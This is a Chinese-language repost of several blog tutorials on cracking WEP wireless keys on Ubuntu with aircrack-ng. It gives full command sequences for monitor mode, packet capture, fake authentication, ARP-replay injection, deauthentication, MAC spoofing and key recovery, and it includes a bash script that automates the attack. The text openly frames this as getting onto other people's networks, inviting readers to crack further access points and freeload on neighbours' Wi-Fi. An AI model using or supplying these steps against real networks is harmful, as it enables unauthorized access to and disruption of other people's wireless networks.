用Ubuntu破解wep無線加密2009-09-29 09:50一、安裝ubuntu和aircrack-ng
先安裝 Ubuntu最新版,更新系統到最新
終端中輸入 sudo apt-get install aircrack-ng 安裝aircrack-ng
沒聯網的話 到别的電腦上網下載下傳aircrack-ng Ubuntu DEB安裝包 安裝
二、破解過程
1、啟動無線網卡的監控模式,在終端中輸入:sudo airmon-ng start wlan0
(wlan0是無線網卡的端口,可在終端中輸入 ifconfig 檢視)
2、檢視無線AP在終端中輸入:
sudo airodump-ng mon0
(特别說明:啟動監控模式後無線網的端口現在是 mon0 !!!)
看看有哪些采用wep加密的AP線上,然後按 ctrl+c 退出,保留終端
3、抓包
另開一個終端,輸入:
sudo airodump-ng -c 6 --bssid AP's MAC -w wep mon0
(-c 後面跟着的6是要破解的AP工作頻道,--bissid後面跟着的AP's MAC是要欲破解AP的MAC位址,-w後面跟着wep的是抓下來的資料包DATA儲存的檔案名,具體情況根據步驟2裡面的線上AP更改頻道和MAC地 址,DATA儲存的檔案名可随便命名)
4、與AP建立虛拟連接配接
再另開一個終端,輸入:
sudo aireplay-ng -1 0 -a AP's MAC -h My MAC mon0
(-h後面跟着的My MAC是自己的無線網卡的MAC位址)
5、進行注入
成功建立虛拟連接配接後輸入:
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h My MAC mon0
現在回頭看下步驟3的終端是不是DATA在開始飛漲!
6、解密
收集有5000個以上的DATA之後,另開一個終端,輸入:
sudo aircrack-ng wep*.cap
進行解密
(如果沒算出來的話,繼續等,aircrack-ng 會在DATA每增加多5000個之後就自動再運作,直到算出密碼為至)
7、收工
破 解出密碼後在終端中輸入 sudo airmon-ng stop mon0 關閉監控模式,不然無線網卡會一直向剛剛的AP進行注入的,用ctrl+c退出或者直接關閉終端都是不行的。 現在可以沖浪去了,或者重複步聚1-7破解其它的AP 呵呵兄弟們沖浪時可别太猛了,不然把主人給沖翻了可就不好。
///////////////////////////////////////////////////
用Ubuntu破解WEP密鑰
看了這篇文章,任何人都可以安裝和運作Linux,并破解WEP密鑰。我一共花了整整兩天,并閱讀了大量資料才做出這個東西,現在拿出來和大家分享。
看了這篇文章,任何人都可以安裝和運作Linux,并破解WEP密鑰。我一共花了整整兩天,并閱讀了大量資料才做出 這個東西,現在拿出來和大家分享。我不是Linux方面的專家。你所需要的就是一個有無線網卡的舊筆記本和一份Ubuntu Linux的拷貝,這是目前最流行并且最易于安裝的Linux發行版本之一。
第一步,很顯然,是安裝Ubuntu。從CD啟動,按訓示操作,非常簡單。要注意的是,接下來的每一步都要有序進行,否則就達不到預期目标。
下一步是安裝其它程式。首先要保證你的本本可以聯網。安裝其它程式,需要打開一個終端視窗,并鍵入如下代碼:
sudo cp /etc/apt/sources.list /etc/apt/sources.list_backup
sudo gedit /etc/apt/sources.list
在編輯器中,用以下代碼代替其它東西:
## Add comments (##) in front of any line to remove it from being checked.
## Use the following sources.list at your own risk.
## MAJOR BUG FIX UPDATES produced after the final release
## UBUNTU SECURITY UPDATES
## BACKPORTS REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
## PLF REPOSITORY (Unsupported. May contain illegal packages. Use at own risk.)
儲存檔案、退出編輯器。敲入如下指令:
sudo apt-get update
現在我們可以安裝後續将會用到的包了:
sudo apt-get install build-essential
sudo apt-get install aircrack
sudo apt-get install kismet
sudo apt-get install airsnort
sudo apt-get install linux-source
sudo apt-get install linux-headers
sudo apt-get install sharutils
接下來你應該更新整個系統,方法是,進入系統菜單——>Administration——>Update Manager。單擊“Check”,開始安裝更新。然後重新開機系統。完成後,為Madwifi驅動打更新檔。
這個地方可能會有點複雜。我的無線網卡(Linksys WPC55AG)用的是Atheros驅動,我需要對之打更新檔。如果你的驅動和我的不同,你需要研究一下是否需要為驅動打更新檔,是否甚至可以和 Aircrack套件協同工作。Aircrack-ng.org的論壇是一個用來測試的好地方,當然了,google search也是的。如果你的網卡也是Atheros的,我們稱之為ath0,那麼,在終端視窗敲入iwconfig,會出現一行字元,顯示以太網控制器 是Atheros Communications……
我們來打更新檔。當發現硬碟舊的驅動時,會暫時讓你的無線網卡無法工作。先進入/usr/src目錄,下載下傳新的驅動、删掉老驅動,然後安裝新驅動,并打上更新檔。你可以把以下代碼拷貝粘貼到終端:
sudo -i
cd /usr/src
ifconfig ath0 down
rmmod ath_rate_sample wlan_wep ath_rate_onoe ath_pci wlan ath_hal
find /lib/modules -name ‘ath*’ -exec rm -v {} \;
find /lib/modules -name ‘wlan*’ -exec rm -v {} \;
tar zxvf madwifi-cvs-20051025.tar.gz
cd madwifi
patch -Np1 -i ../madwifi-cvs-20051025.patch
make && make install
modprobe ath_pci
如果你用的是Atheros驅動,接下來我們舊需要配置kismet了。如果你用的是其它驅動,就必須看你所使用的文法。首先進入Kismet配置,然後改變源代碼行。
sudo gedit /etc/kismet/kismet.conf
把以“source=”打頭的代碼行變為“source=madwifi_ag,ath0,madwifi”,重新開機計算機。重新開機後你将可以通過無線網卡通路英特網。
現在我們開始破解。打開一個終端視窗,進入監控模式,運作ksimet。
sudo airmon start ath0
sudo kismet
找到你想要破解的無線網絡,需要注意其ESSID和通道,然後敲Ctrl-C退出。
接下來運作airodump。
sudo airodump ath0 filename channel# 1
檔案名随你意,可以作為ivs檔案存在你的home目錄下,或者存在你運作指令的任何目錄下。
從airodump中拷貝無線網絡的bssid,具體做法是選中後敲Shift+Ctrl+C。打開一個新的終端視窗,以便我們可以運作 aireplay,開始注入資料包,導緻資料量上升。我們想要airodump中的資料欄顯示在10萬到40萬之間。資料包越多,aircrack就可以 越快地找到WEP密鑰。如果WEP密鑰是128位的,我們可能需要多達100萬個資料包。
sudo aireplay -1 0 -e ESSID -a BSSID -h 0:1:2:3:4:5 ath0
應該把網絡和無線連接配接聯系起來。如果總是逾時,你需要離無線路由器更近,或通過“sudo iwconfig ath0 rate 1M”改變接口速率。
接下來我們想開始注入資料包。
sudo aireplay -3 -b BSSID -h 0:1:2:3:4:5 ath0
起初隻是讀取資料包,并且報告0個ARP請求、發送0個資料包。隻需要等一兩分鐘,就會開始大量發送資料包了。如果傳回文本,并報告說已經被削弱了,那麼敲Ctrl+C,重新運作指令。可以通過敲入下面這條指令來加速任何事情:
sudo aireplay -0 ath0 -a BSSID ath0
否則就隻坐等事情慢慢進行吧。随着資料包開始被發送,Airodump中的資料欄就開始飙升。等到收到了預期數量的資料包,打開一個新的終端視窗,運作aircrack。
sudo aircrack filename.ivs
一分鐘後,aircrack應該傳回WEP密鑰。如果沒有傳回,那就繼續回收更多的資料包。
這做起來一點都不費勁,但可以起作用。
ubuntu下wep密碼破解腳本
#!/bin/bash
#ubuntu下WEP密碼破解 version 2.0
MY_MAC=$(set $(ifconfig|grep "wlan0") && echo $5)
AP_MAC=ff:ff:ff:ff:ff:ff
yn=y
##準備區
if [ ! -f /usr/sbin/airmon-ng ] ;then
sudo apt-get install aircrack-ng
fi
##破解區
while [ "$yn" == "y" ]
do
echo "啟動無線網卡的監控模式"
sudo airmon-ng start wlan0
read -p "檢視可用AP,等會好了就按ctrl+c,先回車吧" tmp
trap "echo 繼續" INT
read -p "欲破解AP的MAC位址:" AP_MAC
read -p "使用的頻道(預設6):" tmp
CHANNEL=${tmp:-6}
read -p "臨時檔案名(預設wep):" tmp
FILE=${tmp:-wep}
gnome-terminal -e "sudo airodump-ng -c "$CHANNEL" --bssid "$AP_MAC" -w "$FILE" mon0"
echo "與AP建立虛拟連接配接"
sudo aireplay-ng -1 0 -a "$AP_MAC" -h "$MY_MAC" mon0
echo "進行注入"
gnome-terminal -e "sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b "$AP_MAC" -h "$MY_MAC" mon0"
read -p "請在DATA達到5000後按回車開始破解" tmp
sudo aircrack-ng "$FILE"*.cap
echo "清理戰場"
rm "$FILE"*
read -p "繼續不?" tmp
case tmp in
[yY]|[yY][eE][sS]) yn=y;;
[nN]*) yn=n;;
*) exit 0;;
esac
done
sudo airmon-ng stop mon0
ubuntu下破解wep無線密碼 2009-11-07 02:38 (分類:linux)
這個事情本來就是個走在道德邊緣的事兒,是以我就無恥的說站在研究學習的角度上大家研究研究吧。。。。
一、軟硬體環境
1.最起碼你得有個帶無線網卡的本本或者桌上型電腦吧?
2.RT,你得裝上和我一樣的ubuntu系統吧?你沒裝或者不打算裝的話就别往下看了。
3.通過新立得軟體管理器或者通過apt-get install 來安裝aircrack-ng這個軟體包(會提示你一并安裝iw這個包)。
二、破解過程:
1.開第一個shell視窗,輸入ifconfig -a 看到你的無線網卡,顯示為wlan0,将mac位址複制粘貼到一個文檔中,後面要用到。
2.啟用無線網卡。輸入ifconfig wlan0 up
再輸入airmon-ng start wlan0 11 開啟信道6的監聽,或者輸入airmon-ng start wlan0開啟所有信道的監聽。當然如果你要破解的無線再信道n上,将6替換成對應的數值n就可以了。
3.輸入airodump-ng --ivs -w name -c 11 mon0 截取資料包。name是截取的包生成檔案的名字,可以随便起,我們以name為例;11是信道,同樣是替換成你要破解無線所在信道對應的數值。回車确認 後,在出現的shell裡找到你要破解無線對應的BSSID,也就是AP的MAC,也複制或者記錄到文檔裡,後面要用到。
7.建立虛拟連接配接:開第二個shell視窗,輸入aireplay-ng -1 0 -a <目标AP MAC> -h <自己的瑞銀MAC> mon0,當出現笑臉後連接配接成功。剛才複制的mac用上了吧?呵呵!
(這步很關鍵,不行的話就多試幾次,輸入iwconfig mon0 rate 2M 降低傳輸速度對建立連接配接有幫助)
8.aireplay-ng -2 -p 0841 -c ffffffffffff -b <目标AP MAC> -h <自己的無線網卡MAC> mon0 進行互動式攻擊。如成功輸入Y确認
9.耐心等待第一個shell視窗的data的數字增加到1.5萬以上。如果信号好的話很快,信号一般的話可以去看電視了。。。
10.開第三個shell視窗,輸入aircrack-ng -n 64 -b <目标AP MAC> name*.ivs 。這裡的64是指你破解的無線密碼是64位加密的,如果沒有破解成功,則改成128位再試,應該沒有問題!
11.如果順利,馬上就能得到Key了。
最後,希望在蹭或者将要蹭别人無線用的朋友能有一點公德心,收發下email、上個QQ、再頂多上個網頁就可以了,不要看線上視訊、下載下傳東西,不要影響無線主人的正常使用,人家是花了銀子的!
Ubuntu下無用戶端無線WEP加密破解實戰講解2008-04-24 13:31在圖形界面中,打開一個Shell,如下圖,輸入ifconfig -a 察看目前網卡
這裡我就使用USB網卡為例,可以看到有一個名為rausb0的網卡,狀态是未載入,這裡先不要載入,先将MAC位址修改成需僞造的任意MAC位址,
輸入macchanger –m 00:11:22:33:44:55 rausb0
-m後跟要僞造的MAC,之後再跟要修改的網卡名即可,這裡我們将該USB網卡MAC修改成00:11:22:33:44:55
然後再載入網卡,輸入:
ifconfig -a rausb0 up來載入USB網卡驅動
下來,我們可以使用如Kismet、Airosnort等工具來掃描目前無線網絡的AP,
然後,我們需要将網卡激活成monitor模式,才可以進行後續的破解,指令如下:
airmon-ng start rausb0 3,這裡這個3就是我們發現的AP的頻道,然後輸入下列指令開始抓包
airodump-ng -w test.cap --channel 3 rausb0 ,這裡test.cap就是我設定的抓封包件名
下來,就可以進行FakeAuth攻擊,這種攻擊就是專門在預攻擊無線接入點AP沒有用戶端活動甚至不存在Client的情況下使用的。具體指令如下:
aireplay-ng -1 1 -e AP’s ESSID -a AP’s MAC -h FakeMAC rausb0
這裡-1指的就是采用FakeAuth攻擊模式,後面跟延遲;-e後面跟AP的ESSID,-a後面設定AP的MAC,-h後面則是前面僞造的MAC,最後是無線網卡。
與此同時,為了IVs(初始化向量)的擷取,必須進行ArpRequest注入式攻擊,這個很重要,可以有效提高抓包數量及破解速度,指令如下
aireplay-ng -3 -b AP's MAC -h Client's MAC -x 1024 rausb0
解釋一下:-3指的是采取ArpRequest注入攻擊方式,-b後面跟上要入侵的AP的MAC位址,-h後面跟的是監測到的用戶端MAC位址,這裡我們使用剛才僞造的用戶端MAC,如上圖中顯示的,至于-x 1024指的是定義每秒發送資料包數量,這個值可以小一些,但最高1024就可以了,這裡我使用預設,最後是指定USB無線網卡接下來,就可以同步開啟aircrack-ng來進行同步破解了,指令如下:
aircrack-ng -x -f 2 test-01.cap這裡-x是暴力破解模式,-f指的是啟用密碼複雜度為2 ,後面是我們即時儲存的那個抓封包件,
本文轉自suifei部落格園部落格,原文連結:http://www.cnblogs.com/Chinasf/archive/2010/05/07/1729455.html,如需轉載請自行聯系原作者